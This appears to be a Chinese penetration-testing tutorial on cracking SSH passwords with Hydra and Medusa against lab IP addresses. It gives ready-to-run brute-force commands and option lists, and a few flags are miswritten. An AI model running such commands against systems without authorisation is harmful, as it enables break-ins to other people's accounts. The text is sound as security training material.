SSH密码暴力破解
1、Hydra(海德拉)
hydra 是世界顶级密码暴力密码破解工具,支持几乎所有协议的在线密码破解,功能强大,其密码能否被破解关键取决于破解字典是否足够强大,在网络安全渗透过程中是一款必备的测试工具。
1.1指定用户破解
打开kali虚拟机
输入hydra -h 查看帮助
Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1(大写P后面跟着字典文件,尝试用密码破解)
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN(注意此处是大写L,后跟字典文件,小写P后跟指定密码)
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5hydra -1 admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
可输入命令hydra -h|less查看帮助
破解命令如下例如:
root@kali:~# hydra -l root -P pass.txt(已存在的字典文件) 192.168.106.134(需破解的主机ip) ssh
如图破解成功。
破解 SSH 账号有两种方式,一种是指定账号破解,一种是指定用户列表破解。详细命令如下:
(1)hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
例如输入命令“hydra -l root -P pwd2.dic -t 1 -vV -e ns 192.168.44.139 ssh”对IP地址为“192.168.44.139”的 root 账号密码进行破解。
如上图:
“hydra -l root -P pwd2.dic -t 1 -vV -e ns -o save.log 192.168.44.139 ssh ”将扫描结果保存在 save.log 文件中,打开该文件可以看到成功破解的结果
2、Medusa(美杜莎)
Medusa(美杜莎)是一个速度快,支持大规模并行,模块化,爆破登录。可以同时对多个主机,用户或密码执行强力测试。Medusa和 hydra一样,同样属于在线密码破解工具。不同的是,medusa 的稳定性相较于 hydra要好很多,但其支持模块要比 hydra少一些。
2.1语法参数
Medusa
[-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT] 目标主机名称或者IP地址
-H [FILE] 包含目标主机名称或者IP地址文件
-u [TEXT] 测试的用户名
-U [FILE] 包含测试的用户名文件
-p [TEXT] 测试的密码
-P [FILE] 包含测试的密码文件
-C [FILE] 组合条目文件
-0 [FILE] 日志信息文件
-e [n/s/ns] n代表空密码,s代表为密码与用户名相同
-M [TEXT] 模块执行名称
-m [TEXT] 传递参数到模块,显示所有的模块名称
-n [NUM] 使用非默认Tcp端口
-S 启用SSL
-r [NUM] 重试间隔时间,默认为3秒
-t [NUM] 设定线程数量
-T 同时测试的主机总数
-L 并行化,每个用户使用一个线程
-f 在任何主机上找到第一个账号/密码后,停止破解
-F 在任何主机上找到第-个有效的用户名/密码后停止审计
-g 显示模块的使用信息
-V [NUM] 详细级别(0-6 )
-W [NUM] 错误调试级别( 0-10 )
-V 显示版本
-Z [TEXT] 继续扫描上一次
2.2破解SSH密码
root@kali:~# medusa -M ssh -h 192.168.106.134 -U root -P passlist. txt
破解单一服务器 SSH 密码
(1)通过文件来指定 host 和 user,host.txt 为目标主机名称或者 IP 地址,user.txt 指定需要暴力破解的用户名,密码指定为 password
medusa -M ssh -H host.txt -U users.txt -p password
(2)对单一服务器进行密码字典暴力破解
破解成功后会显示 success 字样,如上图,具体命令如下:
medusa -M ssh -h 192.168.157.131 -u root -P newpass.txt